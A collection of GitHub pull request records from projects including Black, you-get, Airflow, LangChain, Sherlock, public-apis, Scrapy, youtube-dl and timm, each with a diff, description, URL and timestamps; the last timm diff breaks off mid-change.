diff --git a/CHANGES.md b/CHANGES.md index 1c53604d4d..7e356f1f29 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -7,6 +7,9 @@ - `Black` now respects `--skip-string-normalization` when normalizing multiline docstring quotes (#1637) +- `Black` no longer adds an incorrect space after a parenthesized assignment expression + in if/while statements (#1655) + - fixed a crash when PWD=/ on POSIX (#1631) ### 20.8b1 diff --git a/docs/change_log.md b/docs/change_log.md index b733716665..cc5015f873 100644 --- a/docs/change_log.md +++ b/docs/change_log.md @@ -9,6 +9,11 @@ - `Black` now respects `--skip-string-normalization` when normalizing multiline docstring quotes (#1637) +- `Black` no longer adds an incorrect space after a parenthesized assignment expression + in if/while statements (#1655) + +- fixed a crash when PWD=/ on POSIX (#1631) + ### 20.8b1 #### _Packaging_ diff --git a/src/black/__init__.py b/src/black/__init__.py index 048e771ce9..64a1865590 100644 --- a/src/black/__init__.py +++ b/src/black/__init__.py @@ -5190,9 +5190,9 @@ def normalize_invisible_parens(node: Node, parens_after: Set[str]) -> None: if check_lpar: if is_walrus_assignment(child): - continue + pass - if child.type == syms.atom: + elif child.type == syms.atom: if maybe_make_parens_invisible_in_atom(child, parent=node): wrap_in_parentheses(node, child, visible=False) elif is_one_tuple(child): diff --git a/tests/data/pep_572.py b/tests/data/pep_572.py index 9e429f913c..637b3bb38c 100644 --- a/tests/data/pep_572.py +++ b/tests/data/pep_572.py @@ -2,6 +2,8 @@ (a := a) if (match := pattern.search(data)) is None: pass +if (match := pattern.search(data)): + pass [y := f(x), y ** 2, y ** 3] filtered_data = [y for x in data if (y := f(x)) is None] (y := f(x)) @@ -41,3 +43,5 @@ def foo(answer: (p := 42) = 5): while x := f(x): pass +while (x := f(x)): + pass
Fixes #1174 Fixes #1588 Previously Black would format this code ``` if (foo := True): print(foo) ``` as ``` if (foo := True) : print(foo) ``` adding an incorrect space after the RPAR. Buggy code in the normalize_invisible_parens function caused the colon to be wrapped in invisible parentheses. The LPAR of that pair was then prefixed with a single space at the request of the whitespace function. This commit fixes the accidental skipping of a pre-condition check which must return True before parenthesis normalization of a specific child Leaf or Node can happen. The pre-condition check being skipped was why the colon was wrapped in invisible parentheses.
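A runnable version of the case this record describes, assembled from the new `pep_572.py` test lines in the diff (the names `pattern` and `data` are illustrative; requires Python 3.8+ for the walrus operator): a parenthesized assignment expression used directly as an if/while condition, which the buggy parenthesis normalization rendered with a stray space before the colon.

```python
import re

pattern = re.compile(r"\d+")
data = "value 42"

# Buggy output looked like `if (match := pattern.search(data)) :`
if (match := pattern.search(data)):
    print(match.group())  # 42

while (x := 0):
    pass  # never entered; included only to cover the while-statement form
```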
https://api.github.com/repos/psf/black/pulls/1655
2020-08-29T23:45:05Z
2020-08-31T21:20:07Z
2020-08-31T21:20:06Z
2020-09-02T22:29:17Z
634
psf/black
24,160
Fix http/https mixed content on index page
diff --git a/index.html b/index.html index df68e63e35..cc3bee36b8 100644 --- a/index.html +++ b/index.html @@ -102,7 +102,7 @@ <h1 id="you-get">You-Get</h1> <p>Interested? <a href="#installation">Install it</a> now and <a href="#getting-started">get started by examples</a>.</p> <p>Are you a Python programmer? Then check out <a href="https://github.com/soimort/you-get">the source</a> and fork it!</p> <div class="figure"> -<img src="http://i.imgur.com/GfthFAz.png" /> +<img src="https://i.imgur.com/GfthFAz.png" /> </div> <h2 id="installation">Installation</h2> diff --git a/index.md b/index.md index a51e35d759..1e6af9e51c 100644 --- a/index.md +++ b/index.md @@ -51,7 +51,7 @@ Interested? [Install it](#installation) now and [get started by examples](#getti Are you a Python programmer? Then check out [the source](https://github.com/soimort/you-get) and fork it! -![](http://i.imgur.com/GfthFAz.png) +![](https://i.imgur.com/GfthFAz.png) ## Installation
you-get.org is served over https so images should be secured too. <!-- Reviewable:start --> --- This change is [<img src="https://reviewable.io/review_button.svg" height="34" align="absmiddle" alt="Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/1447) <!-- Reviewable:end -->
https://api.github.com/repos/soimort/you-get/pulls/1447
2016-10-09T20:35:10Z
2016-10-14T18:26:28Z
2016-10-14T18:26:28Z
2016-10-14T18:26:28Z
330
soimort/you-get
20,999
Clarify 2.3.0 kubernetes min version is about library not cluster
diff --git a/README.md b/README.md index 6f5830e68b211..01eab7b755979 100644 --- a/README.md +++ b/README.md @@ -85,15 +85,15 @@ Airflow is not a streaming solution, but it is often used to process real-time d Apache Airflow is tested with: -| | Main version (dev) | Stable version (2.3.0) | -|---------------------|-------------------------|--------------------------| -| Python | 3.7, 3.8, 3.9, 3.10 | 3.6, 3.7, 3.8, 3.9 | -| Platform | AMD64/ARM64(\*) | AMD64 | -| Kubernetes | 1.20, 1.21, 1.22, 1.23 | 1.18, 1.19, 1.20 | -| PostgreSQL | 10, 11, 12, 13 | 9.6, 10, 11, 12, 13 | -| MySQL | 5.7, 8 | 5.7, 8 | -| SQLite | 3.15.0+ | 3.15.0+ | -| MSSQL | 2017(\*), 2019 (\*) | | +| | Main version (dev) | Stable version (2.3.0) | +|---------------------|-------------------------|-------------------------| +| Python | 3.7, 3.8, 3.9, 3.10 | 3.6, 3.7, 3.8, 3.9 | +| Platform | AMD64/ARM64(\*) | AMD64 | +| Kubernetes | 1.20, 1.21, 1.22, 1.23 | 1.20, 1.21, 1.22, 1.23 | +| PostgreSQL | 10, 11, 12, 13 | 9.6, 10, 11, 12, 13 | +| MySQL | 5.7, 8 | 5.7, 8 | +| SQLite | 3.15.0+ | 3.15.0+ | +| MSSQL | 2017(\*), 2019 (\*) | | \* Experimental diff --git a/RELEASE_NOTES.rst b/RELEASE_NOTES.rst index a13e8e3ef0a7e..15ac6c1b0a389 100644 --- a/RELEASE_NOTES.rst +++ b/RELEASE_NOTES.rst @@ -41,8 +41,13 @@ Previously, a task’s log is dynamically rendered from the ``[core] log_filenam A new ``log_template`` table is introduced to solve this problem. This table is synchronized with the aforementioned config values every time Airflow starts, and a new field ``log_template_id`` is added to every DAG run to point to the format used by tasks (``NULL`` indicates the first ever entry for compatibility). -Minimum kubernetes version bumped from ``3.0.0`` to ``21.7.0`` (#20759) -""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +Minimum kubernetes library version bumped from ``3.0.0`` to ``21.7.0`` (#20759) +""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" + +.. note:: + + This is only about changing the ``kubernetes`` library, not the Kubernetes cluster. Airflow support for + Kubernetes version is described in `Installation prerequisites <https://airflow.apache.org/docs/apache-airflow/stable/installation/prerequisites.html>`_. No change in behavior is expected. This was necessary in order to take advantage of a `bugfix <https://github.com/kubernetes-client/python-base/commit/70b78cd8488068c014b6d762a0c8d358273865b4>`_ concerning refreshing of Kubernetes API tokens with EKS, which enabled the removal of some `workaround code <https://github.com/apache/airflow/pull/20759>`_.
It was not clear from the release notes that the minimum version bump for kubernetes was about the library rather than the cluster version. Also, the README was not updated with the minimum supported Kubernetes cluster versions for the 2.3.0 release.
https://api.github.com/repos/apache/airflow/pulls/23398
2022-05-02T08:49:34Z
2022-05-02T09:01:51Z
2022-05-02T09:01:51Z
2022-05-08T08:17:55Z
1,016
apache/airflow
14,459
[docs]: add missing tiktoken dependency
diff --git a/docs/docs/expression_language/get_started.ipynb b/docs/docs/expression_language/get_started.ipynb index 39c04a9f61a291..2ca5072c911977 100644 --- a/docs/docs/expression_language/get_started.ipynb +++ b/docs/docs/expression_language/get_started.ipynb @@ -321,7 +321,7 @@ "outputs": [], "source": [ "# Requires:\n", - "# pip install langchain docarray\n", + "# pip install langchain docarray tiktoken\n", "\n", "from langchain.chat_models import ChatOpenAI\n", "from langchain.embeddings import OpenAIEmbeddings\n",
Description: I was following the docs and got an error about a missing tiktoken dependency. This adds it to the comment where the langchain and docarray libs are listed.
https://api.github.com/repos/langchain-ai/langchain/pulls/14497
2023-12-10T00:04:07Z
2023-12-13T01:04:49Z
2023-12-13T01:04:49Z
2023-12-13T01:04:49Z
157
langchain-ai/langchain
43,654
Chore / Minor docker improvements
diff --git a/Dockerfile b/Dockerfile index 159246673..0393bc2ad 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,7 +1,6 @@ FROM python:3.7-alpine as build WORKDIR /wheels -RUN apk update --no-cache \ - && apk add --no-cache \ +RUN apk add --no-cache \ g++ \ gcc \ libxml2 \ diff --git a/docker-compose.yml b/docker-compose.yml index e7e97c421..c1d659e27 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,6 +1,8 @@ version: '2' + services: sherlock: build: . + image: theyahya/sherlock volumes: - "./results:/opt/sherlock/results"
- Remove unnecessary `apk update`
- Set image name in `docker-compose.yml`
https://api.github.com/repos/sherlock-project/sherlock/pulls/402
2019-12-04T15:50:50Z
2019-12-04T16:41:31Z
2019-12-04T16:41:31Z
2019-12-04T18:09:43Z
197
sherlock-project/sherlock
36,385
Add Pinata
diff --git a/README.md b/README.md index d6e9216acb..898fe2ffb4 100644 --- a/README.md +++ b/README.md @@ -290,6 +290,7 @@ API | Description | Auth | HTTPS | CORS | | [OneDrive](https://dev.onedrive.com/) | File Sharing and Storage | `OAuth` | Yes | Unknown | | [Pantry](https://getpantry.cloud/) | Free JSON storage for small projects | No | Yes | Yes | | [Pastebin](https://pastebin.com/doc_api) | Plain Text Storage | `apiKey` | Yes | Unknown | +| [Pinata](https://docs.pinata.cloud/) | IPFS Pinning Services API | `apiKey` | Yes | Unknown | | [Quip](https://quip.com/dev/automation/documentation) | File Sharing and Storage for groups | `apiKey` | Yes | Yes | | [Web3 Storage](https://web3.storage/) | File Sharing and Storage for Free with 1TB Space | `apiKey` | Yes | Yes |
- [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not have more than 100 characters
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [ ] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit

[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/2583
2021-10-17T02:25:41Z
2021-10-26T06:09:28Z
2021-10-26T06:09:28Z
2021-10-26T06:09:28Z
234
public-apis/public-apis
36,100
chore: Removing tests/requirements.txt and adding dependencies to the tox.ini file
diff --git a/conftest.py b/conftest.py index 2bfa46f5a27..2ab3dffd425 100644 --- a/conftest.py +++ b/conftest.py @@ -1,10 +1,6 @@ -import platform -import sys from pathlib import Path import pytest -from twisted import version as twisted_version -from twisted.python.versions import Version from twisted.web.http import H2_ENABLED from scrapy.utils.reactor import install_reactor @@ -85,14 +81,12 @@ def only_not_asyncio(request, reactor_pytest): def requires_uvloop(request): if not request.node.get_closest_marker("requires_uvloop"): return - if sys.implementation.name == "pypy": - pytest.skip("uvloop does not support pypy properly") - if platform.system() == "Windows": - pytest.skip("uvloop does not support Windows") - if twisted_version == Version("twisted", 21, 2, 0): - pytest.skip("https://twistedmatrix.com/trac/ticket/10106") - if sys.version_info >= (3, 12): - pytest.skip("uvloop doesn't support Python 3.12 yet") + try: + import uvloop + + del uvloop + except ImportError: + pytest.skip("uvloop is not installed") def pytest_configure(config): diff --git a/tests/requirements.txt b/tests/requirements.txt deleted file mode 100644 index ca5f6ddbd93..00000000000 --- a/tests/requirements.txt +++ /dev/null @@ -1,17 +0,0 @@ -# Tests requirements -attrs -pexpect >= 4.8.0 -pyftpdlib >= 1.5.8 -pytest -pytest-cov==4.0.0 -pytest-xdist -sybil >= 1.3.0 # https://github.com/cjw296/sybil/issues/20#issuecomment-605433422 -testfixtures -uvloop; platform_system != "Windows" - -bpython # optional for shell wrapper tests -brotli; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests -brotlicffi; implementation_name == 'pypy' # optional for HTTP compress downloader middleware tests -zstandard; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests -ipython -pywin32; sys_platform == "win32" diff --git a/tox.ini b/tox.ini index 237aa489c2a..b5effb527e3 100644 --- a/tox.ini +++ b/tox.ini @@ -7,9 +7,23 @@ envlist = pre-commit,pylint,typing,py minversion = 1.7.0 +[test-requirements] +deps = + attrs + pexpect >= 4.8.0 + pyftpdlib >= 1.5.8 + pygments + pytest + pytest-cov==4.0.0 + pytest-xdist + sybil >= 1.3.0 # https://github.com/cjw296/sybil/issues/20#issuecomment-605433422 + testfixtures + pywin32; sys_platform == "win32" + [testenv] deps = - -rtests/requirements.txt + {[test-requirements]deps} + # mitmproxy does not support PyPy mitmproxy; implementation_name != 'pypy' passenv = @@ -81,7 +95,7 @@ deps = w3lib==1.17.0 zope.interface==5.1.0 lxml==4.4.1 - -rtests/requirements.txt + {[test-requirements]deps} # mitmproxy 8.0.0 requires upgrading some of the pinned dependencies # above, hence we do not install it in pinned environments at the moment @@ -124,8 +138,12 @@ deps = robotexclusionrulesparser Pillow Twisted[http2] - brotli - zstandard + uvloop; platform_system != "Windows" + bpython # optional for shell wrapper tests + brotli; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests + brotlicffi; implementation_name == 'pypy' # optional for HTTP compress downloader middleware tests + zstandard; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests + ipython [testenv:extra-deps-pinned] basepython = python3.8 @@ -136,6 +154,12 @@ deps = Pillow==7.1.0 robotexclusionrulesparser==1.6.2 brotlipy + uvloop==0.14.0; platform_system != "Windows" + bpython==0.7.1 + zstandard==0.1; implementation_name != 'pypy' + ipython==2.0.0 + brotli==0.5.2; implementation_name != 'pypy' + brotlicffi==0.8.0; 
implementation_name == 'pypy' install_command = {[pinned]install_command} setenv = {[pinned]setenv}
Resolves https://github.com/scrapy/scrapy/issues/6270
https://api.github.com/repos/scrapy/scrapy/pulls/6272
2024-03-06T14:06:42Z
2024-03-13T06:22:48Z
2024-03-13T06:22:48Z
2024-03-13T06:22:48Z
1,210
scrapy/scrapy
34,295
[vgtv] Add new extractor
diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py index e49ac3e5278..18f73a8906b 100644 --- a/youtube_dl/extractor/__init__.py +++ b/youtube_dl/extractor/__init__.py @@ -325,6 +325,7 @@ from .veoh import VeohIE from .vesti import VestiIE from .vevo import VevoIE +from .vgtv import VGTVIE from .vh1 import VH1IE from .viddler import ViddlerIE from .videobam import VideoBamIE diff --git a/youtube_dl/extractor/vgtv.py b/youtube_dl/extractor/vgtv.py new file mode 100644 index 00000000000..0964b96aab9 --- /dev/null +++ b/youtube_dl/extractor/vgtv.py @@ -0,0 +1,73 @@ +# coding: utf-8 +from __future__ import unicode_literals + +import re + +from .common import InfoExtractor + +from ..utils import ( + ExtractorError +) + +class VGTVIE(InfoExtractor): + # Because of the #! in the URL structure we need to add ' before and after given URL. + # Or else it will cry: -bash: !/video/100495/lars-og-lars-sesong-6-episode-6-lakselus: event not found + _VALID_URL = r'http://(?:www\.)?vgtv\.no/#!/(?:.*)/(?P<id>[0-9]+)/(?P<title>[^?#]*)' + _TEST = { + 'url': 'http://www.vgtv.no/#!/video/84196/hevnen-er-soet-episode-10-abu', + 'md5': 'b8be7a234cebb840c0d512c78013e02f', + 'info_dict': { + 'id': '84196', + 'ext': 'mp4', + 'title': 'Hevnen er søt episode 10: Abu', + 'description': 'md5:e25e4badb5f544b04341e14abdc72234', + 'timestamp': 1404626400, + 'upload_date': '20140706' + } + } + + def _real_extract(self, url): + mobj = re.match(self._VALID_URL, url) + video_id = mobj.group('id') + + # Download JSON file containing video info. + data = self._download_json('http://svp.vg.no/svp/api/v1/vgtv/assets/%s?appName=vgtv-website' % video_id, video_id, 'Downloading media JSON') + + # Known streamType: vod, live, wasLive + # Will it even be possible to add support for live streams? + if data['streamType'] != 'vod': + raise ExtractorError('Stream type \'%s\' is not yet supported.' % data['streamType'], expected=True) + + # Add access token to image or it will fail. + thumbnail = data['images']['main'] + '?t[]=900x506q80' + + formats = [] + + # Most videos are in MP4, but some are either HLS or HDS. + # Don't want to support HDS. + if data['streamUrls']['mp4'] is not None: + formats.append({ + 'url': data['streamUrls']['mp4'], + 'format_id': 'mp4', + 'ext': 'mp4' + }) + elif data['streamUrls']['hls'] is not None: + self.to_screen(u'No MP4 URL found, using m3u8. This may take some extra time.') + formats.append({ + 'url': data['streamUrls']['hls'], + 'format_id': 'm3u8', + 'ext': 'mp4' + }) + else: + raise ExtractorError('No download URL found for video: %s.' % video_id, expected=True) + + return { + 'id': video_id, + 'title': data['title'], + 'description': data['description'], + 'thumbnail': thumbnail, + 'timestamp': data['published'], + 'duration': data['duration'], + 'view_count': data['displays'], + 'formats': formats, + } \ No newline at end of file
Because of the #! in the URL structure for VGTV, the URL has to be wrapped in single quotes (') when passed on the command line. Otherwise bash will cry: -bash: !/video/100495/lars-og-lars-sesong-6-episode-6-lakselus: event not found
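A minimal sanity check of the `_VALID_URL` pattern copied from the new extractor above (the test URL is the one from the diff); the single quotes are only a shell concern, since `!` after `#` triggers bash history expansion in an interactive shell:

```python
# Sketch: verify the VGTV _VALID_URL regex extracts the video id and title.
import re

_VALID_URL = r'http://(?:www\.)?vgtv\.no/#!/(?:.*)/(?P<id>[0-9]+)/(?P<title>[^?#]*)'

m = re.match(_VALID_URL, 'http://www.vgtv.no/#!/video/84196/hevnen-er-soet-episode-10-abu')
print(m.group('id'))     # 84196
print(m.group('title'))  # hevnen-er-soet-episode-10-abu
```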
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/3678
2014-09-04T19:05:57Z
2014-09-08T14:27:49Z
2014-09-08T14:27:49Z
2014-09-08T14:28:31Z
1,036
ytdl-org/youtube-dl
50,535
partners: add license field
diff --git a/libs/partners/anthropic/pyproject.toml b/libs/partners/anthropic/pyproject.toml index 53ab7dd79fd70a..459d07d3b4ff3a 100644 --- a/libs/partners/anthropic/pyproject.toml +++ b/libs/partners/anthropic/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-anthropic" -version = "0.0.1.post1" +version = "0.0.1.post2" description = "An integration package connecting AnthropicMessages and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/anthropic" diff --git a/libs/partners/google-genai/pyproject.toml b/libs/partners/google-genai/pyproject.toml index f98ed0a765edb9..28884a3cbf13f9 100644 --- a/libs/partners/google-genai/pyproject.toml +++ b/libs/partners/google-genai/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-google-genai" -version = "0.0.6" +version = "0.0.6.post1" description = "An integration package connecting Google's genai package and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/google-genai" diff --git a/libs/partners/google-vertexai/pyproject.toml b/libs/partners/google-vertexai/pyproject.toml index 34c2be261dddac..e1ce09d46cd4da 100644 --- a/libs/partners/google-vertexai/pyproject.toml +++ b/libs/partners/google-vertexai/pyproject.toml @@ -5,6 +5,7 @@ description = "An integration package connecting GoogleVertexAI and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/google-vertexai" diff --git a/libs/partners/mistralai/pyproject.toml b/libs/partners/mistralai/pyproject.toml index 807c8c445b595d..dbfc0a7191c3ef 100644 --- a/libs/partners/mistralai/pyproject.toml +++ b/libs/partners/mistralai/pyproject.toml @@ -5,6 +5,7 @@ description = "An integration package connecting Mistral and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/mistralai" diff --git a/libs/partners/nvidia-ai-endpoints/pyproject.toml b/libs/partners/nvidia-ai-endpoints/pyproject.toml index 6ba0e0ca90cd5b..0146a6f75f5210 100644 --- a/libs/partners/nvidia-ai-endpoints/pyproject.toml +++ b/libs/partners/nvidia-ai-endpoints/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-nvidia-ai-endpoints" -version = "0.0.1.post1" +version = "0.0.1.post2" description = "An integration package connecting NVIDIA AI Endpoints and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/nvidia-ai-endpoints" diff --git a/libs/partners/nvidia-trt/pyproject.toml b/libs/partners/nvidia-trt/pyproject.toml index a8847942f7648c..2cbaaa6be14031 100644 --- a/libs/partners/nvidia-trt/pyproject.toml +++ b/libs/partners/nvidia-trt/pyproject.toml @@ -5,6 +5,7 @@ description = "An integration package connecting TritonTensorRT and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" 
[tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/nvidia-trt" diff --git a/libs/partners/openai/pyproject.toml b/libs/partners/openai/pyproject.toml index 3cb369ca2eda9b..6bdf5a1f62be3c 100644 --- a/libs/partners/openai/pyproject.toml +++ b/libs/partners/openai/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-openai" -version = "0.0.2.post1" +version = "0.0.2.post2" description = "An integration package connecting OpenAI and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/openai" diff --git a/libs/partners/robocorp/pyproject.toml b/libs/partners/robocorp/pyproject.toml index c80e5d81ed51b5..e8e7974146b09c 100644 --- a/libs/partners/robocorp/pyproject.toml +++ b/libs/partners/robocorp/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-robocorp" -version = "0.0.1.post2" +version = "0.0.1.post3" description = "An integration package connecting Robocorp and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/robocorp" diff --git a/libs/partners/together/pyproject.toml b/libs/partners/together/pyproject.toml index 1193130016117e..6bf4795ce14374 100644 --- a/libs/partners/together/pyproject.toml +++ b/libs/partners/together/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-together" -version = "0.0.2.post1" +version = "0.0.2.post2" description = "An integration package connecting Together and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/together"
- bumps package post versions for packages without current unreleased updates
- will bump package version in release PRs associated with packages that do have changes (mistral, vertex)
https://api.github.com/repos/langchain-ai/langchain/pulls/16117
2024-01-17T01:54:33Z
2024-01-17T16:37:14Z
2024-01-17T16:37:14Z
2024-01-17T16:37:15Z
1,694
langchain-ai/langchain
43,152
scaled_dot_product_attention: don't dropout in eval
diff --git a/timm/models/beit.py b/timm/models/beit.py index 3863198f12..663dcc4bd4 100644 --- a/timm/models/beit.py +++ b/timm/models/beit.py @@ -155,7 +155,7 @@ def forward(self, x, shared_rel_pos_bias: Optional[torch.Tensor] = None): x = F.scaled_dot_product_attention( q, k, v, attn_mask=rel_pos_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/cait.py b/timm/models/cait.py index 4bc7dafc53..40d56061d3 100644 --- a/timm/models/cait.py +++ b/timm/models/cait.py @@ -50,7 +50,7 @@ def forward(self, x): if self.fused_attn: x_cls = torch.nn.functional.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/eva.py b/timm/models/eva.py index 81bcce525d..68b315386c 100644 --- a/timm/models/eva.py +++ b/timm/models/eva.py @@ -126,7 +126,7 @@ def forward( x = F.scaled_dot_product_attention( q, k, v, attn_mask=attn_mask, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/fastvit.py b/timm/models/fastvit.py index d3d9bfdf65..b3143ae58b 100644 --- a/timm/models/fastvit.py +++ b/timm/models/fastvit.py @@ -514,7 +514,7 @@ def forward(self, x: torch.Tensor) -> torch.Tensor: if self.fused_attn: x = torch.nn.functional.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/maxxvit.py b/timm/models/maxxvit.py index 12709f5818..6283443ce5 100644 --- a/timm/models/maxxvit.py +++ b/timm/models/maxxvit.py @@ -190,7 +190,7 @@ def forward(self, x, shared_rel_pos: Optional[torch.Tensor] = None): k.transpose(-1, -2).contiguous(), v.transpose(-1, -2).contiguous(), attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ).transpose(-1, -2).reshape(B, -1, H, W) else: q = q * self.scale @@ -259,7 +259,7 @@ def forward(self, x, shared_rel_pos: Optional[torch.Tensor] = None): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/metaformer.py b/timm/models/metaformer.py index 98a79f598b..7b026a2e43 100644 --- a/timm/models/metaformer.py +++ b/timm/models/metaformer.py @@ -198,7 +198,7 @@ def forward(self, x): if self.fused_attn: x = F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: attn = (q @ k.transpose(-2, -1)) * self.scale diff --git a/timm/models/nest.py b/timm/models/nest.py index de57ec6e99..d1901cee21 100644 --- a/timm/models/nest.py +++ b/timm/models/nest.py @@ -59,14 +59,14 @@ def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.) 
def forward(self, x): """ x is shape: B (batch_size), T (image blocks), N (seq length per image block), C (embed dim) - """ + """ B, T, N, C = x.shape # result of next line is (qkv, B, num (H)eads, T, N, (C')hannels per head) qkv = self.qkv(x).reshape(B, T, N, 3, self.num_heads, C // self.num_heads).permute(3, 0, 4, 1, 2, 5) q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple) if self.fused_attn: - x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p) + x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p if self.training else 0.) else: q = q * self.scale attn = q @ k.transpose(-2, -1) # (B, H, T, N, N) @@ -330,7 +330,7 @@ def __init__( # Hint: (img_size // patch_size) gives number of patches along edge of image. sqrt(self.num_blocks[0]) is the # number of blocks along edge of image self.block_size = int((img_size // patch_size) // math.sqrt(self.num_blocks[0])) - + # Patch embedding self.patch_embed = PatchEmbed( img_size=img_size, diff --git a/timm/models/pvt_v2.py b/timm/models/pvt_v2.py index 00379b158a..16302002eb 100644 --- a/timm/models/pvt_v2.py +++ b/timm/models/pvt_v2.py @@ -130,7 +130,7 @@ def forward(self, x, feat_size: List[int]): k, v = kv.unbind(0) if self.fused_attn: - x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p) + x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p if self.training else 0.) else: q = q * self.scale attn = q @ k.transpose(-2, -1) diff --git a/timm/models/swin_transformer.py b/timm/models/swin_transformer.py index 41b45afb69..34452c7cf1 100644 --- a/timm/models/swin_transformer.py +++ b/timm/models/swin_transformer.py @@ -164,7 +164,7 @@ def forward(self, x, mask: Optional[torch.Tensor] = None): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_mask, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/twins.py b/timm/models/twins.py index b96a0234d0..3cd25fb433 100644 --- a/timm/models/twins.py +++ b/timm/models/twins.py @@ -75,7 +75,7 @@ def forward(self, x, size: Size_): if self.fused_attn: x = F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale @@ -172,7 +172,7 @@ def forward(self, x, size: Size_): if self.fused_attn: x = torch.nn.functional.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/visformer.py b/timm/models/visformer.py index 9f5da60be5..953fc64d5e 100644 --- a/timm/models/visformer.py +++ b/timm/models/visformer.py @@ -95,7 +95,7 @@ def forward(self, x): if self.fused_attn: x = torch.nn.functional.scaled_dot_product_attention( q.contiguous(), k.contiguous(), v.contiguous(), - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: attn = (q @ k.transpose(-2, -1)) * self.scale diff --git a/timm/models/vision_transformer.py b/timm/models/vision_transformer.py index 10b9296b49..b82b9865f2 100644 --- a/timm/models/vision_transformer.py +++ b/timm/models/vision_transformer.py @@ -85,7 +85,7 @@ def forward(self, x): if self.fused_attn: x = F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale @@ -285,7 +285,7 @@ def forward(self, x): if self.fused_attn: x_attn = 
